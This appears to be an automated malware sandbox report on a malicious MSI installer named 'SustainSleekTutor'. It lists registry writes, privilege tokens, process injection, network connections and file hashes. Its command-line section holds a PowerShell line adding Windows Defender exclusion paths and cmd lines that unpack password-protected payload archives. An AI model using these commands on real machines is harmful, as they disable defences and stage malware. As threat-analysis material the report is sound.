Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\Version = "100794368" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\SourceList\PackageName = "92553e176daf1cc411113c65eeec0fb2327100fc43356352787844ae85b78fdf.msi" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\ProductName = "SustainSleekTutor" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\PackageCode = "422D740D8F2748241AF491420E7509A6" C:\Windows\system32\msiexec.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Token: 35 N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Token: 35 N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1332 wrote to memory of 1288 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\MsiExec.exe
PID 1332 wrote to memory of 1288 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\MsiExec.exe
PID 1332 wrote to memory of 1288 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\MsiExec.exe
PID 1332 wrote to memory of 1288 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\MsiExec.exe
PID 1332 wrote to memory of 1288 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\MsiExec.exe
PID 1288 wrote to memory of 2964 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 2964 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 2964 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 2160 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\cmd.exe
PID 1288 wrote to memory of 2160 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\cmd.exe
PID 1288 wrote to memory of 2160 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\cmd.exe
PID 2160 wrote to memory of 2132 N/A C:\Windows\System32\cmd.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe
PID 2160 wrote to memory of 2132 N/A C:\Windows\System32\cmd.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe
PID 2160 wrote to memory of 2132 N/A C:\Windows\System32\cmd.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe
PID 2160 wrote to memory of 2132 N/A C:\Windows\System32\cmd.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe
PID 2160 wrote to memory of 992 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2160 wrote to memory of 992 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2160 wrote to memory of 992 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2160 wrote to memory of 3036 N/A C:\Windows\System32\cmd.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe
PID 2160 wrote to memory of 3036 N/A C:\Windows\System32\cmd.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe
PID 2160 wrote to memory of 3036 N/A C:\Windows\System32\cmd.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe
PID 2160 wrote to memory of 3036 N/A C:\Windows\System32\cmd.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe
PID 1288 wrote to memory of 2136 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe
PID 1288 wrote to memory of 2136 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe
PID 1288 wrote to memory of 2136 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe
PID 1288 wrote to memory of 2136 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe
PID 1288 wrote to memory of 640 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\SustainSleekTutor\tsetup.exe
PID 1288 wrote to memory of 640 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\SustainSleekTutor\tsetup.exe
PID 1288 wrote to memory of 640 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\SustainSleekTutor\tsetup.exe
PID 1288 wrote to memory of 640 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\SustainSleekTutor\tsetup.exe
PID 1288 wrote to memory of 640 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\SustainSleekTutor\tsetup.exe
PID 1288 wrote to memory of 640 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\SustainSleekTutor\tsetup.exe
PID 1288 wrote to memory of 640 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\SustainSleekTutor\tsetup.exe
PID 640 wrote to memory of 848 N/A C:\Program Files\SustainSleekTutor\tsetup.exe C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp
PID 640 wrote to memory of 848 N/A C:\Program Files\SustainSleekTutor\tsetup.exe C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp
PID 640 wrote to memory of 848 N/A C:\Program Files\SustainSleekTutor\tsetup.exe C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp
PID 640 wrote to memory of 848 N/A C:\Program Files\SustainSleekTutor\tsetup.exe C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp
PID 640 wrote to memory of 848 N/A C:\Program Files\SustainSleekTutor\tsetup.exe C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp
PID 640 wrote to memory of 848 N/A C:\Program Files\SustainSleekTutor\tsetup.exe C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp
PID 640 wrote to memory of 848 N/A C:\Program Files\SustainSleekTutor\tsetup.exe C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp
PID 848 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe
PID 848 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe
PID 848 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe
PID 848 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\92553e176daf1cc411113c65eeec0fb2327100fc43356352787844ae85b78fdf.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\DrvInst.exe

DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000003D0" "00000000000004C4"

C:\Windows\system32\MsiExec.exe

C:\Windows\system32\MsiExec.exe -Embedding 9629F5D0995E5F15862E05B252C1310E M Global\MSI0000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\SustainSleekTutor','C:\Program Files','C:\Program Files'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /min "" "C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe" x "C:\Program Files\SustainSleekTutor\lBktGjuuaOaTazRwJvXXhRyefRHhOg" -o"C:\Program Files\SustainSleekTutor\" -p"10551gtm0S(>Gf#qrEw>" -y & ping 127.0.0.1 -n 2 & start /min "" "C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe" x "C:\Program Files\SustainSleekTutor\NMnDkvvmlBOPWlKYckpqMpfXmIsbMf" -x!1_bFchqPntlegL.exe -x!sss -x!1_ZyhMwXBzCIJsXiZOsvVNAbbXEpqwBz.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\SustainSleekTutor\" -p"98858uC(.?=^~2>PRa?!" -y

C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe

"C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe" x "C:\Program Files\SustainSleekTutor\lBktGjuuaOaTazRwJvXXhRyefRHhOg" -o"C:\Program Files\SustainSleekTutor\" -p"10551gtm0S(>Gf#qrEw>" -y

C:\Windows\system32\PING.EXE

ping 127.0.0.1 -n 2

C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe

"C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe" x "C:\Program Files\SustainSleekTutor\NMnDkvvmlBOPWlKYckpqMpfXmIsbMf" -x!1_bFchqPntlegL.exe -x!sss -x!1_ZyhMwXBzCIJsXiZOsvVNAbbXEpqwBz.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\SustainSleekTutor\" -p"98858uC(.?=^~2>PRa?!" -y

C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe

"C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe" -number 127 -file file3 -mode mode3

C:\Program Files\SustainSleekTutor\tsetup.exe

"C:\Program Files\SustainSleekTutor\tsetup.exe"

C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp" /SL5="$801FC,44246395,814592,C:\Program Files\SustainSleekTutor\tsetup.exe"

C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe

"C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 im.qq.com udp
NL 149.154.167.51:443 tcp
NL 95.161.76.100:443 tcp
NL 95.161.76.100:80 tcp
NL 149.154.167.51:443 tcp
NL 95.161.76.100:443 tcp
NL 95.161.76.100:80 95.161.76.100 tcp
US 8.8.8.8:53 td.telegram.org udp
NL 149.154.167.51:80 149.154.167.51 tcp
NL 149.154.167.99:443 td.telegram.org tcp
US 8.8.8.8:53 www.microsoft.com udp
NL 149.154.167.99:443 td.telegram.org tcp
NL 149.154.167.91:443 tcp
NL 149.154.167.51:443 tcp
NL 95.161.76.100:443 tcp
NL 149.154.167.91:80 149.154.167.91 tcp
NL 95.161.76.100:80 95.161.76.100 tcp
NL 149.154.167.51:80 149.154.167.51 tcp
SG 149.154.171.5:443 tcp
SG 149.154.171.5:80 149.154.171.5 tcp
US 8.8.8.8:53 mozilla.cloudflare-dns.com udp
US 162.159.61.4:443 mozilla.cloudflare-dns.com tcp
NL 95.161.76.101:443 tcp

Files

memory/1288-12-0x0000000000210000-0x0000000000220000-memory.dmp

memory/2964-17-0x000000001B450000-0x000000001B732000-memory.dmp

memory/2964-18-0x0000000002040000-0x0000000002048000-memory.dmp

C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe

MD5 c31c4b04558396c6fabab64dcf366534
SHA1 fa836d92edc577d6a17ded47641ba1938589b09a
SHA256 9d182f421381429fd77598feb609fefb54dcaef722ddbf5aa611b68a706c10d3
SHA512 814dcbc1d43bc037dadc2f3f67856dd790b15fc1b0c50fa74a169c8cc02cdc79d44f1f10e200ef662eee20cd6b5ca646ec4e77673e3fe3cb7dfb7649243f6e99

C:\Program Files\SustainSleekTutor\lBktGjuuaOaTazRwJvXXhRyefRHhOg

MD5 86e0062ac9e3c38a69470a57bb619533
SHA1 7d04a283f51e145724e20a5925ee811a4645e5d9
SHA256 42a64f04499a0836946073eb7bfc1cb67a98faa58d65eeb09fb6ac8fccc7f547
SHA512 aefc23fcf566748b60de0e95268f834cef3e4cfb1754b18e9ea2e1a867a764d027d43c68aad2b7c3f4520b3232fd50430c2b7fb4494dee223ac340a8c1e67794

C:\Program Files\SustainSleekTutor\NMnDkvvmlBOPWlKYckpqMpfXmIsbMf

MD5 17f3ece27717fa4a5ad13f06e6c2846e
SHA1 47b8230c0f0dd0b8a451bd378203a0ec0aaa13f6
SHA256 f0217b72add9c431299fda7983e8a7c592f6b4cd5a1df5118208c19dc7251c86
SHA512 998dcba619566edba18b2dcaefd8e86d1d6c09340c8004cf487d6944bb2a90b75231f2d3140162bcf0a161321d5febccf7d947d4752451424082f3cd06de9b7b

C:\Program Files\SustainSleekTutor\2_bFchqPntlegL.exe

MD5 90134a5b913cd5d9d993f6f58601740e
SHA1 c6fc923eae06097227dab095633a0c47beba327a
SHA256 8462d6b3f1a8037f6f60412d3f4e0ecad89aaed3c10915ffa1e602c5ae8b0942
SHA512 7385ebcce7e33efb3a9b26d9690d8a2a221bc05071bc499f313de2de8d31935dd0cdd366ac7baccd4004d9e1eb27a0471328785ad1acf325054fd036d4b9dd61

C:\Program Files\SustainSleekTutor\tsetup.exe

MD5 8a53cf72375f6899082463c36422d411
SHA1 161d9d3b21bf0d9a9790b92013ec76c6d839af06
SHA256 1b31e3758c4b158143dc41c7c4617984d958760d8d7718e1e38492c67f6bbf65
SHA512 daadba04fb90002a2cb8e44c1b98d6bf702b9cfe33d3b6dc981c877e0a77c620f2538a2748f2fb4e88493e326cc45764c54dad659d8d2d018b74b24fd727a190

memory/640-48-0x0000000000400000-0x00000000004D4000-memory.dmp

C:\Config.Msi\f76d2bc.rbs

MD5 ed46bb3d75d948aeb94df3f780265460
SHA1 c1d2151fd876707c69a7747cfebc07320398fcbb
SHA256 c9fe3c4ee09313f239dc71fd3d105544edd6b6bc2512ee6b02195177fb9ff7fe
SHA512 78209494c1f2fcf99cae3498de87807975fe32023d7773ef0de1de13a61fd0776701589f2be0d55c2970339105052cec27cf42779fbab1ec5aa0352a6a1956dd

\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp

MD5 d90927477dbf0725af0a10e151c184c4
SHA1 4cd69b23ee9c1efe9bd539f0fef841a09a4a773e
SHA256 43182a0ae7e22cc7f9b8028dc71e82826c80e9ac265f8d2dfa08876bb41b7029
SHA512 bfbd62482e99127c1bf621a135b464b5f96b86adfcb9064660c0dc1052099643ea9485e1358a758ab466f19c97042dafccb781e157203ea51e43956e4b6f4f98

C:\Windows\Installer\f76d2ba.msi

MD5 7ba3fd79c3ccfdb9f1a311a3f05a7d94
SHA1 c4115a8d08ce102bcb14ed00dad86e52e163c81c
SHA256 92553e176daf1cc411113c65eeec0fb2327100fc43356352787844ae85b78fdf
SHA512 f491a16cc375d6756e2debed08e76f01c090ae52b16e7b3eeed2930e0eb8e47e56aada96b54a6dfaa212354d66ca92955a4fc39434a378429f54416f5043048c

memory/2136-65-0x000000002B0F0000-0x000000002B11F000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\Saved Games\desktop.ini

MD5 b441cf59b5a64f74ac3bed45be9fadfc
SHA1 3da72a52e451a26ca9a35611fa8716044a7c0bbc
SHA256 e6fdf8ed07b19b2a3b8eff05de7bc71152c85b377b9226f126dc54b58b930311
SHA512 fdc26609a674d36f5307fa3f1c212da1f87a5c4cd463d861ce1bd2e614533f07d943510abed0c2edeb07a55f1dccff37db7e1f5456705372d5da8e12d83f0bb3

memory/640-78-0x0000000000400000-0x00000000004D4000-memory.dmp

memory/848-79-0x0000000000400000-0x0000000000710000-memory.dmp

memory/848-81-0x0000000000400000-0x0000000000710000-memory.dmp

memory/848-102-0x0000000000400000-0x0000000000710000-memory.dmp

C:\Users\Admin\AppData\Roaming\Telegram Desktop\modules\x64\d3d\d3dcompiler_47.dll

MD5 a7349236212b0e5cec2978f2cfa49a1a
SHA1 5abb08949162fd1985b89ffad40aaf5fc769017e
SHA256 a05d04a270f68c8c6d6ea2d23bebf8cd1d5453b26b5442fa54965f90f1c62082
SHA512 c7ff4f9146fefedc199360aa04236294349c881b3865ebc58c5646ad6b3f83fca309de1173f5ebf823a14ba65e5ada77b46f20286d1ea62c37e17adbc9a82d02

memory/2960-115-0x00000000002B0000-0x00000000002BA000-memory.dmp

memory/2960-114-0x00000000002B0000-0x00000000002BA000-memory.dmp

memory/640-122-0x0000000000400000-0x00000000004D4000-memory.dmp

memory/848-119-0x0000000000400000-0x0000000000710000-memory.dmp

memory/2960-135-0x0000000000310000-0x000000000031A000-memory.dmp

memory/2960-134-0x0000000000310000-0x000000000031A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab850A.tmp

MD5 d59a6b36c5a94916241a3ead50222b6f
SHA1 e274e9486d318c383bc4b9812844ba56f0cff3c6
SHA256 a38d01d3f024e626d579cf052ac3bd4260bb00c34bc6085977a5f4135ab09b53
